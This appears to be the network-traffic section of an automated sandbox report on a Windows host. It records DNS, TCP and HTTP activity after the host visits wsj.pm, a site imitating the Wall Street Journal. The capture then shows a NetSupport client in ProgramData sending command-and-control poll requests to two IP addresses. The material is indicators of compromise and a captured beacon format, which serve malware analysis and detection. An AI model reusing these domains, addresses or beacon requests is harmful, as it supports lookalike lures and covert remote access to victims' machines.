                                                                                                                Apr 25, 2024 16:59:40.630255938 CEST4434979986.104.72.157192.168.2.17
                                                                                                                Apr 25, 2024 16:59:40.630270958 CEST4434979986.104.72.157192.168.2.17
                                                                                                                Apr 25, 2024 16:59:40.630465984 CEST49799443192.168.2.1786.104.72.157
                                                                                                                Apr 25, 2024 16:59:40.630471945 CEST4434979986.104.72.157192.168.2.17
                                                                                                                Apr 25, 2024 16:59:40.630531073 CEST49799443192.168.2.1786.104.72.157
                                                                                                                Apr 25, 2024 16:59:40.630733967 CEST4434979986.104.72.157192.168.2.17
                                                                                                                Apr 25, 2024 16:59:40.630749941 CEST4434979986.104.72.157192.168.2.17
                                                                                                                Apr 25, 2024 16:59:40.630800009 CEST49799443192.168.2.1786.104.72.157
                                                                                                                Apr 25, 2024 16:59:40.630816936 CEST4434979986.104.72.157192.168.2.17
                                                                                                                Apr 25, 2024 16:59:40.630839109 CEST49799443192.168.2.1786.104.72.157
                                                                                                                Apr 25, 2024 16:59:40.630924940 CEST49799443192.168.2.1786.104.72.157
                                                                                                                Apr 25, 2024 16:59:40.642416000 CEST4434979986.104.72.157192.168.2.17
                                                                                                                Apr 25, 2024 16:59:40.642431021 CEST4434979986.104.72.157192.168.2.17
                                                                                                                Apr 25, 2024 16:59:40.642507076 CEST49799443192.168.2.1786.104.72.157
                                                                                                                Apr 25, 2024 16:59:40.642513990 CEST4434979986.104.72.157192.168.2.17
                                                                                                                Apr 25, 2024 16:59:40.642581940 CEST49799443192.168.2.1786.104.72.157
                                                                                                                Apr 25, 2024 16:59:40.642951965 CEST4434979986.104.72.157192.168.2.17
                                                                                                                Apr 25, 2024 16:59:40.642968893 CEST4434979986.104.72.157192.168.2.17
                                                                                                                Apr 25, 2024 16:59:40.643044949 CEST49799443192.168.2.1786.104.72.157
                                                                                                                Apr 25, 2024 16:59:40.643044949 CEST49799443192.168.2.1786.104.72.157
                                                                                                                Apr 25, 2024 16:59:40.643053055 CEST4434979986.104.72.157192.168.2.17
                                                                                                                Apr 25, 2024 16:59:40.643141985 CEST49799443192.168.2.1786.104.72.157
                                                                                                                Apr 25, 2024 16:59:40.688046932 CEST4434979986.104.72.157192.168.2.17
                                                                                                                Apr 25, 2024 16:59:40.688061953 CEST4434979986.104.72.157192.168.2.17
                                                                                                                Apr 25, 2024 16:59:40.688122034 CEST49799443192.168.2.1786.104.72.157
                                                                                                                Apr 25, 2024 17:00:23.737194061 CEST4434980823.133.88.190192.168.2.17
                                                                                                                Apr 25, 2024 17:00:23.737282991 CEST49808443192.168.2.1723.133.88.190
                                                                                                                Apr 25, 2024 17:00:23.737659931 CEST49808443192.168.2.1723.133.88.190
                                                                                                                Apr 25, 2024 17:00:23.738099098 CEST49809443192.168.2.1723.133.88.190
                                                                                                                Apr 25, 2024 17:00:23.738137007 CEST4434980923.133.88.190192.168.2.17
                                                                                                                Apr 25, 2024 17:00:23.738215923 CEST49809443192.168.2.1723.133.88.190
                                                                                                                Apr 25, 2024 17:00:23.738416910 CEST49809443192.168.2.1723.133.88.190
                                                                                                                Apr 25, 2024 17:00:23.738434076 CEST4434980923.133.88.190192.168.2.17
                                                                                                                Apr 25, 2024 17:00:23.962512016 CEST4434980923.133.88.190192.168.2.17
                                                                                                                Apr 25, 2024 17:00:23.963632107 CEST49809443192.168.2.1723.133.88.190
                                                                                                                Apr 25, 2024 17:00:23.963651896 CEST4434980923.133.88.190192.168.2.17
                                                                                                                Apr 25, 2024 17:00:24.373727083 CEST4434980923.133.88.190192.168.2.17
                                                                                                                Apr 25, 2024 17:00:24.373807907 CEST4434980923.133.88.190192.168.2.17
                                                                                                                Apr 25, 2024 17:00:24.373920918 CEST49809443192.168.2.1723.133.88.190
                                                                                                                Apr 25, 2024 17:00:24.374270916 CEST49809443192.168.2.1723.133.88.190
                                                                                                                Apr 25, 2024 17:00:24.375627041 CEST49810443192.168.2.1723.133.88.190
                                                                                                                Apr 25, 2024 17:00:24.375668049 CEST4434981023.133.88.190192.168.2.17
                                                                                                                Apr 25, 2024 17:00:24.375761032 CEST49810443192.168.2.1723.133.88.190
                                                                                                                Apr 25, 2024 17:00:24.376014948 CEST49810443192.168.2.1723.133.88.190
                                                                                                                Apr 25, 2024 17:00:24.376055002 CEST4434981023.133.88.190192.168.2.17
                                                                                                                Apr 25, 2024 17:00:24.601500034 CEST4434981023.133.88.190192.168.2.17
                                                                                                                Apr 25, 2024 17:00:24.602819920 CEST49810443192.168.2.1723.133.88.190
                                                                                                                Apr 25, 2024 17:00:24.602916956 CEST4434981023.133.88.190192.168.2.17
                                                                                                                Apr 25, 2024 17:00:25.006347895 CEST4434981023.133.88.190192.168.2.17
                                                                                                                Apr 25, 2024 17:00:25.006428957 CEST4434981023.133.88.190192.168.2.17
                                                                                                                Apr 25, 2024 17:00:25.006511927 CEST49810443192.168.2.1723.133.88.190
                                                                                                                Apr 25, 2024 17:00:25.006824970 CEST49810443192.168.2.1723.133.88.190
                                                                                                                Apr 25, 2024 17:00:30.418003082 CEST44349701204.79.197.200192.168.2.17
                                                                                                                Apr 25, 2024 17:00:31.425158024 CEST44349806108.177.122.106192.168.2.17
                                                                                                                Apr 25, 2024 17:00:31.425226927 CEST44349806108.177.122.106192.168.2.17
                                                                                                                Apr 25, 2024 17:00:31.425295115 CEST49806443192.168.2.17108.177.122.106
                                                                                                                Apr 25, 2024 17:00:32.605912924 CEST49806443192.168.2.17108.177.122.106
                                                                                                                Apr 25, 2024 17:00:32.605946064 CEST44349806108.177.122.106192.168.2.17
Timestamp | Source IP | Dest IP | Checksum | Code | Type
Apr 25, 2024 16:58:16.723617077 CEST | 192.168.2.17 | 1.1.1.1 | c22f | (Port unreachable) | Destination Unreachable
Apr 25, 2024 16:58:20.632138014 CEST | 192.168.2.17 | 1.1.1.1 | c22f | (Port unreachable) | Destination Unreachable
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Apr 25, 2024 16:58:16.293147087 CEST | 192.168.2.17 | 1.1.1.1 | 0x744e | Standard query (0) | wsj.pm | A (IP address) | IN (0x0001) | false
Apr 25, 2024 16:58:16.293380976 CEST | 192.168.2.17 | 1.1.1.1 | 0xa652 | Standard query (0) | wsj.pm | 65 | IN (0x0001) | false
Apr 25, 2024 16:58:16.353939056 CEST | 192.168.2.17 | 1.1.1.1 | 0xb5c4 | Standard query (0) | wsj.pm | A (IP address) | IN (0x0001) | false
Apr 25, 2024 16:58:16.354167938 CEST | 192.168.2.17 | 1.1.1.1 | 0x559b | Standard query (0) | wsj.pm | 65 | IN (0x0001) | false
Apr 25, 2024 16:58:18.934890032 CEST | 192.168.2.17 | 1.1.1.1 | 0x1de4 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
Apr 25, 2024 16:58:18.935177088 CEST | 192.168.2.17 | 1.1.1.1 | 0x7aa0 | Standard query (0) | api.ipify.org | 65 | IN (0x0001) | false
Apr 25, 2024 16:58:19.574255943 CEST | 192.168.2.17 | 1.1.1.1 | 0x4c31 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
Apr 25, 2024 16:58:19.574465036 CEST | 192.168.2.17 | 1.1.1.1 | 0x9267 | Standard query (0) | api.ipify.org | 65 | IN (0x0001) | false
Apr 25, 2024 16:58:19.575073957 CEST | 192.168.2.17 | 1.1.1.1 | 0xdada | Standard query (0) | cdn40.click | A (IP address) | IN (0x0001) | false
Apr 25, 2024 16:58:19.575370073 CEST | 192.168.2.17 | 1.1.1.1 | 0x21e6 | Standard query (0) | cdn40.click | 65 | IN (0x0001) | false
Apr 25, 2024 16:58:19.575702906 CEST | 192.168.2.17 | 1.1.1.1 | 0xfe04 | Standard query (0) | wsj.pm | A (IP address) | IN (0x0001) | false
Apr 25, 2024 16:58:19.575865030 CEST | 192.168.2.17 | 1.1.1.1 | 0xae6 | Standard query (0) | wsj.pm | 65 | IN (0x0001) | false
Apr 25, 2024 16:58:21.066613913 CEST | 192.168.2.17 | 1.1.1.1 | 0xedf7 | Standard query (0) | www.google.com | A (IP address) | IN (0x0001) | false
Apr 25, 2024 16:58:21.066967964 CEST | 192.168.2.17 | 1.1.1.1 | 0x46ce | Standard query (0) | www.google.com | 65 | IN (0x0001) | false
Apr 25, 2024 16:58:54.114423037 CEST | 192.168.2.17 | 1.1.1.1 | 0x2502 | Standard query (0) | cdn40.click | A (IP address) | IN (0x0001) | false
Apr 25, 2024 16:58:54.114527941 CEST | 192.168.2.17 | 1.1.1.1 | 0x9e79 | Standard query (0) | cdn40.click | 65 | IN (0x0001) | false
Apr 25, 2024 16:59:36.058567047 CEST | 192.168.2.17 | 1.1.1.1 | 0x50ce | Standard query (0) | cdn40.click | A (IP address) | IN (0x0001) | false
Apr 25, 2024 16:59:38.117964983 CEST | 192.168.2.17 | 1.1.1.1 | 0x100d | Standard query (0) | cdn37.space | A (IP address) | IN (0x0001) | false
Apr 25, 2024 16:59:45.780488014 CEST | 192.168.2.17 | 1.1.1.1 | 0xba98 | Standard query (0) | geo.netsupportsoftware.com | A (IP address) | IN (0x0001) | false
Apr 25, 2024 16:59:58.759903908 CEST | 192.168.2.17 | 1.1.1.1 | 0x728 | Standard query (0) | geo.netsupportsoftware.com | A (IP address) | IN (0x0001) | false
Apr 25, 2024 17:00:43.473124981 CEST | 192.168.2.17 | 1.1.1.1 | 0x7af0 | Standard query (0) | geo.netsupportsoftware.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Apr 25, 2024 16:58:16.623064041 CEST | 1.1.1.1 | 192.168.2.17 | 0x744e | No error (0) | wsj.pm |  | 103.113.70.37 | A (IP address) | IN (0x0001) | false
Apr 25, 2024 16:58:16.777924061 CEST | 1.1.1.1 | 192.168.2.17 | 0xb5c4 | No error (0) | wsj.pm |  | 103.113.70.37 | A (IP address) | IN (0x0001) | false
Apr 25, 2024 16:58:19.045685053 CEST | 1.1.1.1 | 192.168.2.17 | 0x1de4 | No error (0) | api.ipify.org |  | 104.26.12.205 | A (IP address) | IN (0x0001) | false
Apr 25, 2024 16:58:19.045685053 CEST | 1.1.1.1 | 192.168.2.17 | 0x1de4 | No error (0) | api.ipify.org |  | 104.26.13.205 | A (IP address) | IN (0x0001) | false
Apr 25, 2024 16:58:19.045685053 CEST | 1.1.1.1 | 192.168.2.17 | 0x1de4 | No error (0) | api.ipify.org |  | 172.67.74.152 | A (IP address) | IN (0x0001) | false
Apr 25, 2024 16:58:19.045809984 CEST | 1.1.1.1 | 192.168.2.17 | 0x7aa0 | No error (0) | api.ipify.org |  |  | 65 | IN (0x0001) | false
Apr 25, 2024 16:58:19.684766054 CEST | 1.1.1.1 | 192.168.2.17 | 0x4c31 | No error (0) | api.ipify.org |  | 104.26.13.205 | A (IP address) | IN (0x0001) | false
Apr 25, 2024 16:58:19.684766054 CEST | 1.1.1.1 | 192.168.2.17 | 0x4c31 | No error (0) | api.ipify.org |  | 172.67.74.152 | A (IP address) | IN (0x0001) | false
Apr 25, 2024 16:58:19.684766054 CEST | 1.1.1.1 | 192.168.2.17 | 0x4c31 | No error (0) | api.ipify.org |  | 104.26.12.205 | A (IP address) | IN (0x0001) | false
Apr 25, 2024 16:58:19.684806108 CEST | 1.1.1.1 | 192.168.2.17 | 0x9267 | No error (0) | api.ipify.org |  |  | 65 | IN (0x0001) | false
Apr 25, 2024 16:58:19.937031031 CEST | 1.1.1.1 | 192.168.2.17 | 0xdada | No error (0) | cdn40.click |  | 23.133.88.190 | A (IP address) | IN (0x0001) | false
Apr 25, 2024 16:58:20.086261988 CEST | 1.1.1.1 | 192.168.2.17 | 0xfe04 | No error (0) | wsj.pm |  | 103.113.70.37 | A (IP address) | IN (0x0001) | false
Apr 25, 2024 16:58:21.178195000 CEST | 1.1.1.1 | 192.168.2.17 | 0xedf7 | No error (0) | www.google.com |  | 108.177.122.106 | A (IP address) | IN (0x0001) | false
Apr 25, 2024 16:58:21.178195000 CEST | 1.1.1.1 | 192.168.2.17 | 0xedf7 | No error (0) | www.google.com |  | 108.177.122.147 | A (IP address) | IN (0x0001) | false
Apr 25, 2024 16:58:21.178195000 CEST | 1.1.1.1 | 192.168.2.17 | 0xedf7 | No error (0) | www.google.com |  | 108.177.122.99 | A (IP address) | IN (0x0001) | false
Apr 25, 2024 16:58:21.178195000 CEST | 1.1.1.1 | 192.168.2.17 | 0xedf7 | No error (0) | www.google.com |  | 108.177.122.104 | A (IP address) | IN (0x0001) | false
Apr 25, 2024 16:58:21.178195000 CEST | 1.1.1.1 | 192.168.2.17 | 0xedf7 | No error (0) | www.google.com |  | 108.177.122.103 | A (IP address) | IN (0x0001) | false
Apr 25, 2024 16:58:21.178195000 CEST | 1.1.1.1 | 192.168.2.17 | 0xedf7 | No error (0) | www.google.com |  | 108.177.122.105 | A (IP address) | IN (0x0001) | false
Apr 25, 2024 16:58:21.178540945 CEST | 1.1.1.1 | 192.168.2.17 | 0x46ce | No error (0) | www.google.com |  |  | 65 | IN (0x0001) | false
Apr 25, 2024 16:58:54.550862074 CEST | 1.1.1.1 | 192.168.2.17 | 0x2502 | No error (0) | cdn40.click |  | 23.133.88.190 | A (IP address) | IN (0x0001) | false
Apr 25, 2024 16:59:36.282074928 CEST | 1.1.1.1 | 192.168.2.17 | 0x50ce | No error (0) | cdn40.click |  | 23.133.88.190 | A (IP address) | IN (0x0001) | false
Apr 25, 2024 16:59:38.282634020 CEST | 1.1.1.1 | 192.168.2.17 | 0x100d | No error (0) | cdn37.space |  | 86.104.72.157 | A (IP address) | IN (0x0001) | false
Apr 25, 2024 16:59:45.893496037 CEST | 1.1.1.1 | 192.168.2.17 | 0xba98 | No error (0) | geo.netsupportsoftware.com |  | 104.26.0.231 | A (IP address) | IN (0x0001) | false
Apr 25, 2024 16:59:45.893496037 CEST | 1.1.1.1 | 192.168.2.17 | 0xba98 | No error (0) | geo.netsupportsoftware.com |  | 104.26.1.231 | A (IP address) | IN (0x0001) | false
Apr 25, 2024 16:59:45.893496037 CEST | 1.1.1.1 | 192.168.2.17 | 0xba98 | No error (0) | geo.netsupportsoftware.com |  | 172.67.68.212 | A (IP address) | IN (0x0001) | false
Apr 25, 2024 16:59:58.872452974 CEST | 1.1.1.1 | 192.168.2.17 | 0x728 | No error (0) | geo.netsupportsoftware.com |  | 104.26.1.231 | A (IP address) | IN (0x0001) | false
Apr 25, 2024 16:59:58.872452974 CEST | 1.1.1.1 | 192.168.2.17 | 0x728 | No error (0) | geo.netsupportsoftware.com |  | 172.67.68.212 | A (IP address) | IN (0x0001) | false
Apr 25, 2024 16:59:58.872452974 CEST | 1.1.1.1 | 192.168.2.17 | 0x728 | No error (0) | geo.netsupportsoftware.com |  | 104.26.0.231 | A (IP address) | IN (0x0001) | false
Apr 25, 2024 17:00:43.584562063 CEST | 1.1.1.1 | 192.168.2.17 | 0x7af0 | No error (0) | geo.netsupportsoftware.com |  | 104.26.0.231 | A (IP address) | IN (0x0001) | false
Apr 25, 2024 17:00:43.584562063 CEST | 1.1.1.1 | 192.168.2.17 | 0x7af0 | No error (0) | geo.netsupportsoftware.com |  | 104.26.1.231 | A (IP address) | IN (0x0001) | false
Apr 25, 2024 17:00:43.584562063 CEST | 1.1.1.1 | 192.168.2.17 | 0x7af0 | No error (0) | geo.netsupportsoftware.com |  | 172.67.68.212 | A (IP address) | IN (0x0001) | false
• wsj.pm
• https:
  • api.ipify.org
  • cdn40.click
• slscr.update.microsoft.com
• fs.microsoft.com
• login.live.com
• evoke-windowsservices-tas.msedge.net
• www.bing.com
• cdn37.space
• 5.8.63.140 connection: keep-alive cmd=poll info=1 ack=1
• 185.174.102.62 connection: keep-alive cmd=poll info=1 ack=1
• geo.netsupportsoftware.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.17 | 49716 | 103.113.70.37 | 80 | 6544 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
Apr 25, 2024 16:59:01.826615095 CEST | 6 | OUT | Data Raw: 00
                                                                                                                Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.17 | 49717 | 103.113.70.37 | 80 | 6544 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
Apr 25, 2024 16:59:01.828567028 CEST | 6 | OUT | Data Raw: 00
                                                                                                                Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.17 | 49800 | 5.8.63.140 | 443 | 7408 | C:\ProgramData\netsupport\client\client32.exe
Timestamp | Bytes transferred | Direction | Data
Apr 25, 2024 16:59:45.823282957 CEST | 212 | OUT | POST http://5.8.63.140/fakeurl.htm HTTP/1.1
User-Agent: NetSupport Manager/1.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
Host: 5.8.63.140
Connection: Keep-Alive
CMD=POLL
INFO=1
ACK=1
                                                                                                                Data Raw:
                                                                                                                Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.17 | 49801 | 185.174.102.62 | 443 | 7408 | C:\ProgramData\netsupport\client\client32.exe
Timestamp | Bytes transferred | Direction | Data
Apr 25, 2024 16:59:45.912662029 CEST | 220 | OUT | POST http://185.174.102.62/fakeurl.htm HTTP/1.1
User-Agent: NetSupport Manager/1.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
Host: 185.174.102.62
Connection: Keep-Alive
CMD=POLL
INFO=1
ACK=1
                                                                                                                Data Raw:
                                                                                                                Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.17 | 49802 | 104.26.0.231 | 80 | 7408 | C:\ProgramData\netsupport\client\client32.exe
Timestamp | Bytes transferred | Direction | Data
Apr 25, 2024 16:59:46.013895035 CEST | 118 | OUT | GET /location/loca.asp HTTP/1.1
                                                                                                                Host: geo.netsupportsoftware.com
                                                                                                                Connection: Keep-Alive
                                                                                                                Cache-Control: no-cache
Apr 25, 2024 16:59:46.390033007 CEST | 924 | IN | HTTP/1.1 404 Not Found
                                                                                                                Date: Thu, 25 Apr 2024 14:59:46 GMT
                                                                                                                Content-Type: text/html; charset=us-ascii
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: keep-alive
                                                                                                                CF-Ray: 879f32e4f9eb7b94-ATL
                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                cf-apo-via: origin,host
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lpO2r4fs25YzisX9YLOcwDB82LXIOVmigH3XY%2FFt67AmUUvniElkOaPdgZmArGqppH%2F8FlUuDxQmnY%2FPc%2FsNACxS8lgRTe5PUJ2RmA9z1zD21d%2BOYMBhqFgbGMcfZpAYWX%2BTRmneJHv%2FopjQ"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Apr 25, 2024 16:59:46.390058994 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.17 | 49804 | 104.26.0.231 | 80 | 7408 | C:\ProgramData\netsupport\client\client32.exe
Timestamp | Bytes transferred | Direction | Data
Apr 25, 2024 16:59:46.524363995 CEST | 118 | OUT | GET /location/loca.asp HTTP/1.1
                                                                                                                Host: geo.netsupportsoftware.com
                                                                                                                Connection: Keep-Alive
                                                                                                                Cache-Control: no-cache
Apr 25, 2024 16:59:46.912189007 CEST | 916 | IN | HTTP/1.1 404 Not Found
                                                                                                                Date: Thu, 25 Apr 2024 14:59:46 GMT
                                                                                                                Content-Type: text/html; charset=us-ascii
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: keep-alive
                                                                                                                CF-Ray: 879f32e82dd844fb-ATL
                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                cf-apo-via: origin,host
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A6SrsSnqixI3RpKqX%2FZUq7nKTdWLt9aLmUfGW8t0eOlRH1f1EslcbspDPTWflaGdC8mouJqcFzXWVIEyUAsbXrmrGqdWf8ObwhW4bmNHSTKSNhbBXy9%2FbjNzvLQTDXeOZtM%2BEc15T0difRof"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Apr 25, 2024 16:59:46.912214994 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.17 | 49805 | 104.26.0.231 | 80 | 7408 | C:\ProgramData\netsupport\client\client32.exe
Timestamp | Bytes transferred | Direction | Data
Apr 25, 2024 16:59:47.024605036 CEST | 118 | OUT | GET /location/loca.asp HTTP/1.1
                                                                                                                Host: geo.netsupportsoftware.com
                                                                                                                Connection: Keep-Alive
                                                                                                                Cache-Control: no-cache
Apr 25, 2024 16:59:47.398869038 CEST | 926 | IN | HTTP/1.1 404 Not Found
                                                                                                                Date: Thu, 25 Apr 2024 14:59:47 GMT
                                                                                                                Content-Type: text/html; charset=us-ascii
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: keep-alive
                                                                                                                CF-Ray: 879f32eb4ea069f2-ATL
                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                cf-apo-via: origin,host
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xdmZL%2B3RJLcDnTaFr83qRRF8nS%2F%2BnqX9D09jHlAuck7c2%2BV4bzbZgHpxZ00TGk0I7NRAFz0YdbJxdcAcmoP%2Bh%2BRwCW4jWIJhKb2cOrK8xP%2FRmkYT%2Brsyjt7xFzl1UT95yt8BkTYpbhPgdKg6"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Apr 25, 2024 16:59:47.398886919 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.17 | 49718 | 103.113.70.37 | 443 | 6544 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-25 14:58:17 UTC | 649 | OUT | GET / HTTP/1.1
                                                                                                                Host: wsj.pm
                                                                                                                Connection: keep-alive
                                                                                                                Upgrade-Insecure-Requests: 1
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                Sec-Fetch-Site: none
                                                                                                                Sec-Fetch-Mode: navigate
                                                                                                                Sec-Fetch-User: ?1
                                                                                                                Sec-Fetch-Dest: document
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
2024-04-25 14:58:17 UTC | 278 | IN | HTTP/1.1 200 OK
                                                                                                                Date: Thu, 25 Apr 2024 14:58:17 GMT
                                                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                                                Last-Modified: Thu, 25 Apr 2024 14:32:48 GMT
                                                                                                                ETag: "10a944-616eca9453a4b"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 1091908
                                                                                                                Vary: Accept-Encoding
                                                                                                                Connection: close
                                                                                                                Content-Type: text/html
2024-04-25 14:58:17 UTC | 7914 | IN
                                                                                                                Data Ascii: <!DOCTYPE html><html lang=en><head> <meta charset="UTF-8"> <meta name="description" content="Breaking news and analysis from the U.S. and around the world at WSJ.com. Politics, Economics, Markets, Life & Arts, and in-depth reporting." /
                                                                                                                2024-04-25 14:58:17 UTC8000INData Raw: 31 37 52 36 57 6e 43 59 20 2e 57 53 4a 54 68 65 6d 65 2d 2d 62 79 6c 69 6e 65 2d 2d 31 6f 49 55 76 74 51 33 2c 0a 20 20 20 20 20 20 20 20 2e 57 53 4a 54 68 65 6d 65 2d 2d 66 6f 65 2d 61 72 74 69 63 6c 65 2d 2d 31 37 52 36 57 6e 43 59 20 2e 57 53 4a 54 68 65 6d 65 2d 2d 68 65 61 64 6c 69 6e 65 2d 2d 37 56 43 7a 6f 37 41 79 20 61 2c 0a 20 20 20 20 20 20 20 20 2e 57 53 4a 54 68 65 6d 65 2d 2d 66 6f 65 2d 61 72 74 69 63 6c 65 2d 2d 31 37 52 36 57 6e 43 59 20 2e 57 53 4a 54 68 65 6d 65 2d 2d 68 65 61 64 6c 69 6e 65 2d 2d 37 56 43 7a 6f 37 41 79 20 61 3a 6c 69 6e 6b 2c 0a 20 20 20 20 20 20 20 20 2e 57 53 4a 54 68 65 6d 65 2d 2d 66 6f 65 2d 61 72 74 69 63 6c 65 2d 2d 31 37 52 36 57 6e 43 59 20 2e 57 53 4a 54 68 65 6d 65 2d 2d 68 65 61 64 6c 69 6e 65 2d 2d 37 56
                                                                                                                Data Ascii: 17R6WnCY .WSJTheme--byline--1oIUvtQ3, .WSJTheme--foe-article--17R6WnCY .WSJTheme--headline--7VCzo7Ay a, .WSJTheme--foe-article--17R6WnCY .WSJTheme--headline--7VCzo7Ay a:link, .WSJTheme--foe-article--17R6WnCY .WSJTheme--headline--7V


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.17 | 49721 | 103.113.70.37 | 443 | 6544 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-25 14:58:17 UTC | 525 | OUT | GET /css/footer.css HTTP/1.1
                                                                                                                Host: wsj.pm
                                                                                                                Connection: keep-alive
                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                Accept: text/css,*/*;q=0.1
                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                Sec-Fetch-Dest: style
                                                                                                                Referer: https://wsj.pm/
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
2024-04-25 14:58:17 UTC | 273 | IN | HTTP/1.1 200 OK
                                                                                                                Date: Thu, 25 Apr 2024 14:58:17 GMT
                                                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                                                Last-Modified: Wed, 17 Apr 2024 11:28:24 GMT
                                                                                                                ETag: "359e-61649270f4600"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 13726
                                                                                                                Vary: Accept-Encoding
                                                                                                                Connection: close
                                                                                                                Content-Type: text/css


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.17 | 49720 | 103.113.70.37 | 443 | 6544 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-25 14:58:17 UTC | 552 | OUT | GET /fonts/woffs/retina/Retina-Book.woff2 HTTP/1.1
                                                                                                                Host: wsj.pm
                                                                                                                Connection: keep-alive
                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                Origin: https://wsj.pm
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                Accept: */*
                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                Sec-Fetch-Dest: font
                                                                                                                Referer: https://wsj.pm/
